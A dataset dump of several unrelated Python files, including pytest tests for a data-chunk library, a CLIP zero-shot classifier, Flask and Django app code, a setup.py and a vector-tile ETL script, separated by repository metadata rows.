@pytest.mark.parametrize("division", ["exp", "rep", "fold", "run"])
def test_callback_method_invocation(mock_on_call_default, point, division, null_chunk_fixture):
    """Calling `on_<division>_<point>(...)` on a `NullDataChunk` must forward to
    `_on_call_default(division, point, ...)` with the same extra arguments.
    Using `on_fold_end` as an example::

        `on_fold_end(...)` call -> `_on_call_default("fold", "end", ...)` call"""
    callback = null_chunk_fixture.__getattribute__(f"on_{division}_{point}")
    callback("An arg", k="A kwarg")
    mock_on_call_default.assert_called_once_with(division, point, "An arg", k="A kwarg")
@pytest.mark.parametrize("point", ["start", "end"])
@pytest.mark.parametrize("division", ["exp", "rep", "fold", "run"])
def test_do_something_invocation(point, division, null_chunk_fixture):
    """`NullDataChunk._do_something(division, point, ...)` must invoke the
    matching primary callback. Using `on_fold_end` as an example::

        `_do_something("fold", "end", ...)` call -> `on_fold_end(...)` call"""
    target = f"hyperparameter_hunter.data.data_core.NullDataChunk.on_{division}_{point}"
    with mock.patch(target) as mocked_callback:
        null_chunk_fixture._do_something(division, point, "An arg", k="A kwarg")
    mocked_callback.assert_called_once_with("An arg", k="A kwarg")
@pytest.mark.parametrize("point", ["start", "end"])
@pytest.mark.parametrize("division", ["exp", "rep", "fold", "run"])
def test_kind_chunk_invocation(point, division, base_dataset_fixture):
    """`BaseDataset._do_something` must fan out the callback to its three
    `BaseDataChunk`s (`input`, `target`, `prediction`). Using `on_fold_end`::

        `_do_something("fold", "end", ...)` `BaseDataset` call ->
            `on_fold_end(...)` call (`input` chunk)
            `on_fold_end(...)` call (`target` chunk)
            `on_fold_end(...)` call (`prediction` chunk)"""
    target = f"hyperparameter_hunter.data.data_core.BaseDataChunk.on_{division}_{point}"
    with mock.patch(target) as mocked_callback:
        base_dataset_fixture._do_something(division, point, "An arg", k="A kwarg")
    mocked_callback.assert_has_calls([mock.call("An arg", k="A kwarg")] * 3)
##################################################
# `BaseDataChunk` Equality
##################################################
def _update_data_chunk(updates: dict):
    """Build a `BaseDataChunk` and apply *updates* to it.

    Keys prefixed with "T." are set on the chunk's `T` attribute (with the
    prefix stripped); all other keys are set directly on the chunk."""
    chunk = BaseDataChunk(None)
    for name, val in updates.items():
        if name.startswith("T."):
            target, attr = chunk.T, name[2:]
        else:
            target, attr = chunk, name
        setattr(target, attr, val)
    return chunk
@pytest.fixture()
def data_chunk_fixture(request):
    """Indirectly-parametrized `BaseDataChunk` built from `request.param`
    (an empty update mapping when not parametrized)."""
    params = getattr(request, "param", dict())
    return _update_data_chunk(params)
@pytest.fixture()
def another_data_chunk_fixture(request):
    """Second independent `BaseDataChunk` fixture, for equality comparisons."""
    params = getattr(request, "param", dict())
    return _update_data_chunk(params)
#################### Test Scenario Data ####################
# Baseline frames: df_1 differs from df_0 by one cell value; df_2 by its
# index; df_3 by a column name (and shares df_2's index); df_4 adds a column.
df_0 = pd.DataFrame(dict(a=[1, 2, 3], b=[4, 5, 6]))
df_1 = pd.DataFrame(dict(a=[1, 2, 3], b=[999, 5, 6]))
df_2 = pd.DataFrame(dict(a=[1, 2, 3], b=[4, 5, 6]), index=["foo", "bar", "baz"])
df_3 = pd.DataFrame(dict(a=[1, 2, 3], c=[4, 5, 6]), index=["foo", "bar", "baz"])
df_4 = pd.DataFrame(dict(a=[1, 2, 3], b=[4, 5, 6], c=[7, 8, 9]))
# Update mappings fed to `_update_data_chunk`; "T."-prefixed keys land on the
# chunk's `T` attribute. Each scenario differs from every other in at least
# one attribute, which the (in)equality tests below rely on.
chunk_data_0 = dict(d=pd.DataFrame())
chunk_data_1 = dict(d=pd.DataFrame(), fold=df_0)
chunk_data_2 = dict(d=pd.DataFrame(), fold=df_1)
chunk_data_3 = dict(d=pd.DataFrame(), fold=df_2)
chunk_data_4 = {"d": pd.DataFrame(), "fold": df_2, "T.fold": df_3}
chunk_data_5 = {"d": pd.DataFrame(), "fold": df_3, "T.fold": df_2}
chunk_data_6 = {"d": pd.DataFrame(), "fold": df_3, "T.fold": df_2, "T.d": df_4}
@pytest.mark.parametrize(
    ["data_chunk_fixture", "another_data_chunk_fixture"],
    [
        [scenario, scenario]
        for scenario in [
            dict(),
            chunk_data_0,
            chunk_data_1,
            chunk_data_2,
            chunk_data_3,
            chunk_data_4,
            chunk_data_5,
            chunk_data_6,
        ]
    ],
    indirect=True,
)
def test_data_chunk_equality(data_chunk_fixture, another_data_chunk_fixture):
    """Two chunks built from identical update mappings must compare equal."""
    assert data_chunk_fixture == another_data_chunk_fixture
#################### Inequality Tests ####################
# All non-trivial scenarios, in index order; each test below compares one
# scenario against every *other* scenario.
_ALL_CHUNK_DATA = [
    chunk_data_0,
    chunk_data_1,
    chunk_data_2,
    chunk_data_3,
    chunk_data_4,
    chunk_data_5,
    chunk_data_6,
]


def _all_but(index):
    """Return every scenario in `_ALL_CHUNK_DATA` except the one at *index*."""
    return [s for i, s in enumerate(_ALL_CHUNK_DATA) if i != index]


@pytest.mark.parametrize("data_chunk_fixture", _all_but(0), indirect=True)
def test_data_chunk_inequality_0(data_chunk_fixture):
    """A chunk built from `chunk_data_0` differs from all other scenarios."""
    assert _update_data_chunk(chunk_data_0) != data_chunk_fixture


@pytest.mark.parametrize("data_chunk_fixture", _all_but(1), indirect=True)
def test_data_chunk_inequality_1(data_chunk_fixture):
    """A chunk built from `chunk_data_1` differs from all other scenarios."""
    assert _update_data_chunk(chunk_data_1) != data_chunk_fixture


@pytest.mark.parametrize("data_chunk_fixture", _all_but(2), indirect=True)
def test_data_chunk_inequality_2(data_chunk_fixture):
    """A chunk built from `chunk_data_2` differs from all other scenarios."""
    assert _update_data_chunk(chunk_data_2) != data_chunk_fixture


@pytest.mark.parametrize("data_chunk_fixture", _all_but(3), indirect=True)
def test_data_chunk_inequality_3(data_chunk_fixture):
    """A chunk built from `chunk_data_3` differs from all other scenarios."""
    assert _update_data_chunk(chunk_data_3) != data_chunk_fixture


@pytest.mark.parametrize("data_chunk_fixture", _all_but(4), indirect=True)
def test_data_chunk_inequality_4(data_chunk_fixture):
    """A chunk built from `chunk_data_4` differs from all other scenarios."""
    assert _update_data_chunk(chunk_data_4) != data_chunk_fixture


@pytest.mark.parametrize("data_chunk_fixture", _all_but(5), indirect=True)
def test_data_chunk_inequality_5(data_chunk_fixture):
    """A chunk built from `chunk_data_5` differs from all other scenarios."""
    assert _update_data_chunk(chunk_data_5) != data_chunk_fixture


@pytest.mark.parametrize("data_chunk_fixture", _all_but(6), indirect=True)
def test_data_chunk_inequality_6(data_chunk_fixture):
    """A chunk built from `chunk_data_6` differs from all other scenarios."""
    assert _update_data_chunk(chunk_data_6) != data_chunk_fixture
| 40.258883
| 102
| 0.667381
| 1,089
| 7,931
| 4.490358
| 0.129477
| 0.128834
| 0.094888
| 0.0409
| 0.742945
| 0.698978
| 0.653783
| 0.615542
| 0.539468
| 0.447853
| 0
| 0.018766
| 0.133274
| 7,931
| 196
| 103
| 40.464286
| 0.69261
| 0.189888
| 0
| 0.317073
| 0
| 0
| 0.120014
| 0.050295
| 0
| 0
| 0
| 0
| 0.089431
| 1
| 0.130081
| false
| 0
| 0.03252
| 0.01626
| 0.203252
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c93c9aaedb099246f931a93b0f3660c7f68b5819
| 2,481
|
py
|
Python
|
src/models/zeroshot.py
|
mmatena/wise-ft
|
2630c366d252ad32db82ea886f7ab6a752142792
|
[
"MIT"
] | 79
|
2021-10-01T22:29:51.000Z
|
2022-03-30T04:19:58.000Z
|
src/models/zeroshot.py
|
mmatena/wise-ft
|
2630c366d252ad32db82ea886f7ab6a752142792
|
[
"MIT"
] | 2
|
2021-11-18T19:50:59.000Z
|
2022-01-08T00:57:24.000Z
|
src/models/zeroshot.py
|
mmatena/wise-ft
|
2630c366d252ad32db82ea886f7ab6a752142792
|
[
"MIT"
] | 10
|
2021-10-14T18:29:59.000Z
|
2022-03-27T12:40:18.000Z
|
import os
import torch
from tqdm import tqdm
import numpy as np
import clip.clip as clip
import src.templates as templates
import src.datasets as datasets
from src.args import parse_arguments
from src.models.modeling import ClassificationHead, ImageEncoder, ImageClassifier
from src.models.eval import evaluate
def get_zeroshot_classifier(args, clip_model):
    """Build a zero-shot `ClassificationHead` from CLIP text embeddings.

    For each class name of `args.train_dataset`, every prompt template in
    `args.template` is filled in, tokenized, and embedded with the CLIP text
    encoder; the per-template embeddings are averaged and re-normalized to
    give one weight vector per class. The stacked weights (scaled by CLIP's
    learned logit scale) become the weights of the returned head.

    Args:
        args: parsed CLI args; must provide `template`, `train_dataset`,
            `data_location`, `batch_size`, `classnames`, and `device`.
        clip_model: a loaded CLIP model exposing `logit_scale`,
            `encode_text`, `eval`, and `to`.

    Returns:
        ClassificationHead with `normalize=True` and the zero-shot weights.
    """
    assert args.template is not None
    assert args.train_dataset is not None
    template = getattr(templates, args.template)
    logit_scale = clip_model.logit_scale
    # Dataset is only needed for its class names; no data is loaded (None).
    dataset_class = getattr(datasets, args.train_dataset)
    dataset = dataset_class(
        None,
        location=args.data_location,
        batch_size=args.batch_size,
        classnames=args.classnames
    )
    device = args.device
    clip_model.eval()
    clip_model.to(device)
    print('Getting zeroshot weights.')
    with torch.no_grad():
        zeroshot_weights = []
        for classname in tqdm(dataset.classnames):
            # One prompt per template for this class.
            texts = []
            for t in template:
                texts.append(t(classname))
            texts = clip.tokenize(texts).to(device) # tokenize
            embeddings = clip_model.encode_text(texts) # embed with text encoder
            # Normalize each template embedding, average them, then
            # re-normalize the mean to get a unit-length class vector.
            embeddings /= embeddings.norm(dim=-1, keepdim=True)
            embeddings = embeddings.mean(dim=0, keepdim=True)
            embeddings /= embeddings.norm()
            zeroshot_weights.append(embeddings)
        # NOTE: the transpose/squeeze/transpose sequence below is
        # order-sensitive; it rearranges the stacked (n_classes, 1, dim)
        # tensor into the (n_classes, dim) layout ClassificationHead expects.
        zeroshot_weights = torch.stack(zeroshot_weights, dim=0).to(device)
        zeroshot_weights = torch.transpose(zeroshot_weights, 0, 2)
        zeroshot_weights *= logit_scale.exp()
        zeroshot_weights = zeroshot_weights.squeeze().float()
        zeroshot_weights = torch.transpose(zeroshot_weights, 0, 1)
    classification_head = ClassificationHead(normalize=True, weights=zeroshot_weights)
    return classification_head
def eval(args):
    """Build (or load) a zero-shot classifier, evaluate it, and optionally save.

    NOTE: the name shadows the builtin `eval`; kept unchanged because the
    `__main__` guard calls it by this name.
    """
    args.freeze_encoder = True
    if args.load is None:
        encoder = ImageEncoder(args, keep_lang=True)
        head = get_zeroshot_classifier(args, encoder.model)
        # The language transformer is only needed while building the head.
        delattr(encoder.model, 'transformer')
        clf = ImageClassifier(encoder, head, process_images=False)
    else:
        clf = ImageClassifier.load(args.load)
    evaluate(clf, args)
    if args.save is not None:
        clf.save(args.save)
# Script entry point: parse CLI args and run the zero-shot evaluation.
if __name__ == '__main__':
    args = parse_arguments()
    eval(args)
| 30.62963
| 94
| 0.694478
| 292
| 2,481
| 5.715753
| 0.325342
| 0.116836
| 0.02157
| 0.029958
| 0.053925
| 0.053925
| 0.053925
| 0
| 0
| 0
| 0
| 0.003634
| 0.2237
| 2,481
| 81
| 95
| 30.62963
| 0.862928
| 0.012898
| 0
| 0
| 0
| 0
| 0.017981
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 1
| 0.033333
| false
| 0
| 0.166667
| 0
| 0.216667
| 0.016667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c93cab934e2e3f25cd7169e11400beb6e6d43570
| 425
|
py
|
Python
|
app/main/__init__.py
|
csmcallister/beular
|
219bcd552c1303eb0557f3ef56d44355a932399e
|
[
"CNRI-Python"
] | null | null | null |
app/main/__init__.py
|
csmcallister/beular
|
219bcd552c1303eb0557f3ef56d44355a932399e
|
[
"CNRI-Python"
] | null | null | null |
app/main/__init__.py
|
csmcallister/beular
|
219bcd552c1303eb0557f3ef56d44355a932399e
|
[
"CNRI-Python"
] | null | null | null |
from flask import Blueprint
# Blueprint for the app's main routes; `routes` below registers its views.
bp = Blueprint('main', __name__)
@bp.after_app_request
def after_request(response):
    """Cache Bust

    Sets headers on every response so browsers never cache app pages.
    """
    no_cache = "no-cache, no-store, must-revalidate, public, max-age=0"
    headers = response.headers
    headers["Cache-Control"] = no_cache
    headers["Expires"] = 0
    headers["Pragma"] = "no-cache"
    return response
from app.main import routes # noqa: F401
| 25
| 74
| 0.665882
| 54
| 425
| 5.074074
| 0.574074
| 0.164234
| 0.116788
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014837
| 0.207059
| 425
| 17
| 75
| 25
| 0.79822
| 0.063529
| 0
| 0
| 0
| 0
| 0.244032
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.4
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9418c993a05d0182f414df4de245fd5f5288aa8
| 1,470
|
py
|
Python
|
setup.py
|
jmacgrillen/perspective
|
6e6e833d8921c54c907dd6314d4bc02ba3a3c0b6
|
[
"MIT"
] | null | null | null |
setup.py
|
jmacgrillen/perspective
|
6e6e833d8921c54c907dd6314d4bc02ba3a3c0b6
|
[
"MIT"
] | null | null | null |
setup.py
|
jmacgrillen/perspective
|
6e6e833d8921c54c907dd6314d4bc02ba3a3c0b6
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python -*- coding: utf-8 -*-
"""
Name:
setup.py
Desscription:
Install the maclib package.
Version:
1 - Inital release
Author:
J.MacGrillen <macgrillen@gmail.com>
Copyright:
Copyright (c) John MacGrillen. All rights reserved.
"""
from setuptools import setup, find_packages
# Long description shown on package indexes comes straight from the README.
with open("README.md", "r") as fh:
    long_description = fh.read()
# Runtime dependencies installed alongside the package.
install_requirements = [
    "maclib",
    "opencv-python",
    "numpy",
    "Pillow",
    "charset-normalizer"
]
def setup_perspective_package() -> None:
    """
    Install and configure Perspective for use.

    Fix: `python_requires` previously used ">= 3.7.*" — PEP 440 only allows
    the ".*" wildcard with == / !=, so that specifier is invalid and newer
    setuptools rejects it. ">=3.7" expresses the intended constraint.
    """
    setup(
        name='Perspective',
        version="0.0.1",
        description='Analyse images using the range of tools provided',
        long_description=long_description,
        author='J.MacGrillen',
        scripts=[],
        packages=find_packages(exclude=['tests*']),
        include_package_data=True,
        install_requires=install_requirements,
        license="MIT License",
        python_requires=">=3.7",
        classifiers=[
            'Development Status :: 5 - Production/Stable',
            'Intended Audience :: Developers',
            'Natural Language :: English',
            'License :: OSI Approved :: MIT License',
            'Programming Language :: Python',
            'Programming Language :: Python :: 3',
        ],
    )
# Allow direct invocation: `python setup.py ...`
if __name__ == "__main__":
    setup_perspective_package()
| 25.344828
| 71
| 0.593197
| 144
| 1,470
| 5.895833
| 0.652778
| 0.053004
| 0.040047
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008547
| 0.283673
| 1,470
| 57
| 72
| 25.789474
| 0.797721
| 0.202041
| 0
| 0
| 0
| 0
| 0.334234
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029412
| false
| 0
| 0.029412
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c943169325309fd0984d9e08fbc50df17f771916
| 2,159
|
py
|
Python
|
etl/vector/process_all.py
|
nismod/oi-risk-vis
|
a5c7460a8060a797dc844be95d5c23689f42cd17
|
[
"MIT"
] | 2
|
2020-09-29T15:52:48.000Z
|
2021-03-31T02:58:53.000Z
|
etl/vector/process_all.py
|
nismod/oi-risk-vis
|
a5c7460a8060a797dc844be95d5c23689f42cd17
|
[
"MIT"
] | 41
|
2021-05-12T17:12:14.000Z
|
2022-03-17T10:49:20.000Z
|
etl/vector/process_all.py
|
nismod/infra-risk-vis
|
1e5c28cced578d8bd9c78699e9038ecd66f47cf7
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
from argparse import ArgumentParser
import csv
import os
from pathlib import Path
import subprocess
import sys
# Directory containing this script (symlinks resolved) so the shell-script
# path is stable regardless of the current working directory.
this_directory = Path(__file__).parent.resolve()
# Shell script that performs the actual vector -> MBTiles conversion.
vector_script_path = this_directory / 'prepare_vector.sh'
def run_single_processing(in_file_path: Path, out_file_path: Path, layer_name: str, output_layer_name: str, spatial_type: str, where_filter: str, **kwargs):
    """Run prepare_vector.sh for a single layer.

    Fix: arguments are now passed as an argv list with the default
    ``shell=False`` instead of an interpolated shell string, so paths or
    filter values containing spaces, quotes, or shell metacharacters
    (these come from a user-editable CSV) cannot break quoting or inject
    shell commands. Extra CSV columns arrive via **kwargs and are ignored.
    """
    print(f'Processing vector "{in_file_path}" -> "{out_file_path}"')
    command = [
        str(vector_script_path),
        str(in_file_path),
        str(out_file_path),
        output_layer_name,
        spatial_type,
        layer_name,
        where_filter,
    ]
    print(f"Running command: {command}", flush=True)
    subprocess.run(command, stdout=sys.stdout, stderr=sys.stderr)
def process_vector_datasets(raw: Path, out: Path):
    """Convert every layer listed in `<raw>/networks/network_layers.csv`.

    A row is skipped when its output .mbtiles already exists and is newer
    than the source file; otherwise the row is handed to
    `run_single_processing`.
    """
    csv_path = raw / 'networks' / 'network_layers.csv'
    assert csv_path.is_file(), f"{csv_path} is not a file"

    with csv_path.open() as f:
        reader = csv.DictReader(f)
        # The CSV must describe each layer fully.
        assert 'path' in reader.fieldnames
        assert 'layer_name' in reader.fieldnames
        assert 'spatial_type' in reader.fieldnames
        assert 'where_filter' in reader.fieldnames
        assert 'output_layer_name' in reader.fieldnames

        for row in reader:
            src = raw / row['path']
            dst = out / f"{row['output_layer_name']}.mbtiles"
            up_to_date = os.path.exists(dst) and os.path.getmtime(src) < os.path.getmtime(dst)
            if up_to_date:
                print("Skipping", dst)
                continue
            run_single_processing(src, dst, **row)
if __name__ == '__main__':
    # CLI entry point: resolve user-supplied paths and process everything.
    parser = ArgumentParser(description='Converts all vector datasets to GeoJSON and then to MBTILES')
    parser.add_argument('--raw', type=Path, required=True,
                        help='Root of the raw data directory. Assumes a file network_layers.csv exists in the dir.')
    parser.add_argument('--out', type=Path, required=True,
                        help='Directory in which to store results of the processing')
    args = parser.parse_args()
    raw_dir = args.raw.expanduser().resolve()
    out_dir = args.out.expanduser().resolve()
    process_vector_datasets(raw_dir, out_dir)
| 41.519231
| 156
| 0.742937
| 314
| 2,159
| 4.828025
| 0.305732
| 0.073879
| 0.058047
| 0.039578
| 0.108839
| 0.073219
| 0
| 0
| 0
| 0
| 0
| 0.000539
| 0.13988
| 2,159
| 51
| 157
| 42.333333
| 0.815832
| 0.007874
| 0
| 0
| 0
| 0.026316
| 0.279776
| 0.022419
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.052632
| false
| 0
| 0.157895
| 0
| 0.210526
| 0.078947
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c944a392c3c65b876eac48378aa9aaaa59c4cea9
| 1,688
|
py
|
Python
|
django/week9/main/models.py
|
yrtby/Alotech-Fullstack-Bootcamp-Patika
|
e2fd775e2540b8d9698dcb7dc38f84a6d7912e8d
|
[
"MIT"
] | 1
|
2021-11-05T09:45:25.000Z
|
2021-11-05T09:45:25.000Z
|
django/week9/main/models.py
|
yrtby/Alotech-Fullstack-Bootcamp-Patika
|
e2fd775e2540b8d9698dcb7dc38f84a6d7912e8d
|
[
"MIT"
] | null | null | null |
django/week9/main/models.py
|
yrtby/Alotech-Fullstack-Bootcamp-Patika
|
e2fd775e2540b8d9698dcb7dc38f84a6d7912e8d
|
[
"MIT"
] | 3
|
2021-11-07T07:16:30.000Z
|
2021-12-07T20:22:59.000Z
|
from django.db import models
from django.contrib.auth.models import User
from django.core.validators import MinLengthValidator
# Create your models here.
class Post(models.Model):
    """An image post with text content, an author, and a creation timestamp."""

    image = models.ImageField(upload_to='uploads/')
    content = models.TextField(max_length=200, validators=[MinLengthValidator(10)])
    author = models.ForeignKey(User, on_delete=models.CASCADE)
    created_at = models.DateTimeField(auto_now_add=True)

    def __str__(self):
        return f"Post '{self.content}' shared by '{self.author.username}'"

    @property
    def likes_count(self):
        """Number of likes, computed once per instance and cached.

        Fix: the original set `_likes_count` but always returned a fresh
        `like_set.count()`, so the cache was dead code and every access hit
        the database.
        """
        if not hasattr(self, '_likes_count'):
            self._likes_count = self.like_set.count()
        return self._likes_count

    @property
    def comments_count(self):
        """Number of comments, cached per instance (same fix as likes_count)."""
        if not hasattr(self, '_comments_count'):
            self._comments_count = self.comment_set.count()
        return self._comments_count
class Like(models.Model):
    """Records that a user liked a post (one row per like)."""

    post = models.ForeignKey(Post, on_delete=models.CASCADE)
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    created_at = models.DateTimeField(auto_now_add=True)

    def __str__(self):
        return f"Post '{self.post.content}' liked by '{self.user.username}'"
class Comment(models.Model):
    """A user's text comment on a post; content rules mirror Post.content."""

    post = models.ForeignKey(Post, on_delete=models.CASCADE)
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    content = models.TextField(max_length=200, validators=[MinLengthValidator(10)])
    created_at = models.DateTimeField(auto_now_add=True)

    def __str__(self):
        return f"Post '{self.post.content}' commented by '{self.user.username}'"
| 35.914894
| 83
| 0.708531
| 217
| 1,688
| 5.304147
| 0.271889
| 0.046916
| 0.060817
| 0.091225
| 0.653345
| 0.615117
| 0.516073
| 0.516073
| 0.516073
| 0.404865
| 0
| 0.007174
| 0.174171
| 1,688
| 46
| 84
| 36.695652
| 0.818508
| 0.014218
| 0
| 0.514286
| 0
| 0
| 0.126955
| 0.066185
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.085714
| 0.085714
| 0.828571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9463207e60b37b4cf9f338b3635a5669f81cf71
| 286
|
py
|
Python
|
codewars/6kyu/dinamuh/CountingDuplicates/main.py
|
dinamuh/Training_one
|
d18e8fb12608ce1753162c20252ca928c4df97ab
|
[
"MIT"
] | null | null | null |
codewars/6kyu/dinamuh/CountingDuplicates/main.py
|
dinamuh/Training_one
|
d18e8fb12608ce1753162c20252ca928c4df97ab
|
[
"MIT"
] | 2
|
2019-01-22T10:53:42.000Z
|
2019-01-31T08:02:48.000Z
|
codewars/6kyu/dinamuh/CountingDuplicates/main.py
|
dinamuh/Training_one
|
d18e8fb12608ce1753162c20252ca928c4df97ab
|
[
"MIT"
] | 13
|
2019-01-22T10:37:42.000Z
|
2019-01-25T13:30:43.000Z
|
def duplicate_count(text):
    """Count distinct characters occurring more than once, case-insensitively."""
    seen = set()
    repeated = set()
    for ch in text.lower():
        if ch in seen:
            repeated.add(ch)
        else:
            seen.add(ch)
    return len(repeated)
def duplicate_count2(s):
    """Count distinct characters occurring more than once, case-insensitively.

    Fix: the original recomputed `s.lower()` inside the comprehension for
    every candidate character; the lowered string is now built once.
    """
    lowered = s.lower()
    return len([c for c in set(lowered) if lowered.count(c) > 1])
| 20.428571
| 69
| 0.527972
| 47
| 286
| 3.170213
| 0.404255
| 0.161074
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010363
| 0.325175
| 286
| 13
| 70
| 22
| 0.761658
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0
| 0.090909
| 0.363636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c947e59db3be68e0dcce4600b6cfeb33b848886c
| 375
|
py
|
Python
|
tests/test_dir_dataset.py
|
gimlidc/igre
|
bf3425e838cca3d1fa8254a2550ecb44774ee0ef
|
[
"MIT"
] | 1
|
2021-09-24T09:12:06.000Z
|
2021-09-24T09:12:06.000Z
|
tests/test_dir_dataset.py
|
gimlidc/igre
|
bf3425e838cca3d1fa8254a2550ecb44774ee0ef
|
[
"MIT"
] | null | null | null |
tests/test_dir_dataset.py
|
gimlidc/igre
|
bf3425e838cca3d1fa8254a2550ecb44774ee0ef
|
[
"MIT"
] | null | null | null |
import stable.modalities.dir_dataset as dataset
import os.path
def test_load_all_images():
    """Loading the bundled asset directory yields one two-channel image pair
    with the expected resolution and file names."""
    asset_dir = os.path.join("tests", "assets")
    images, metadata = dataset.load_all_images(asset_dir)
    assert metadata["resolutions"] == [(125, 140)]
    assert images[0].shape[2] == 2
    assert metadata["filenames"][0] == ["mari_magdalena-detail.png", "mari_magdalenaIR-detail.png"]
| 34.090909
| 99
| 0.706667
| 51
| 375
| 5.039216
| 0.627451
| 0.046693
| 0.101167
| 0.14786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03096
| 0.138667
| 375
| 10
| 100
| 37.5
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0.221333
| 0.138667
| 0
| 0
| 0
| 0
| 0.375
| 1
| 0.125
| false
| 0
| 0.25
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c949f74729063705c3b6e636bb65a45813ce66bb
| 1,118
|
py
|
Python
|
sample/main.py
|
qjw/flasgger
|
d43644da1fea6af596ff0e2f11517b578377850f
|
[
"MIT"
] | 5
|
2018-03-07T03:54:36.000Z
|
2022-01-01T04:43:48.000Z
|
sample/main.py
|
qjw/flasgger
|
d43644da1fea6af596ff0e2f11517b578377850f
|
[
"MIT"
] | null | null | null |
sample/main.py
|
qjw/flasgger
|
d43644da1fea6af596ff0e2f11517b578377850f
|
[
"MIT"
] | 2
|
2021-11-11T08:48:39.000Z
|
2022-01-01T04:43:49.000Z
|
import logging
import jsonschema
from flask import Flask, jsonify
from flask import make_response
from flasgger import Swagger
from sample.config import Config
def init_logging(app):
    """Attach an INFO-level stream handler to the app logger.

    When the app runs in debug mode, the same handler is also attached to
    SQLAlchemy's engine logger so SQL statements are visible.
    """
    stream = logging.StreamHandler()
    stream.setLevel(logging.INFO)
    fmt = '%(asctime)s %(levelname)s [%(pathname)s:%(lineno)s] - %(message)s'
    stream.setFormatter(logging.Formatter(fmt))

    targets = [app.logger]
    if app.debug:
        targets.append(logging.getLogger('sqlalchemy.engine'))
    for logger in targets:
        logger.setLevel(logging.INFO)
        logger.addHandler(stream)
app = Flask(__name__)
app.config.update(Config or {})  # fall back to an empty config when Config is falsy
init_logging(app)
Swagger(app)  # expose the swagger spec/UI for this app
@app.errorhandler(jsonschema.ValidationError)
def handle_bad_request(e):
    """Turn a jsonschema validation failure into a JSON payload.

    The HTTP status stays 200; the application-level error is carried in the
    `code` field, with the schema's own error message when one is provided.
    """
    payload = jsonify(
        code=400,
        message=e.schema.get('error', '参数校验错误'),
        details=e.message,
        schema=str(e.schema),
    )
    return make_response(payload, 200)
# Imported late so the blueprint can reference the configured `app`.
from sample.api import api
app.register_blueprint(api, url_prefix='/api/v123456')
# Run the development server when executed directly.
if __name__=='__main__':
    app.run()
| 25.409091
| 77
| 0.675313
| 135
| 1,118
| 5.422222
| 0.459259
| 0.061475
| 0.077869
| 0.068306
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013575
| 0.209302
| 1,118
| 44
| 78
| 25.409091
| 0.81448
| 0
| 0
| 0
| 0
| 0.032258
| 0.100983
| 0.022341
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.225806
| 0.032258
| 0.322581
| 0.032258
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
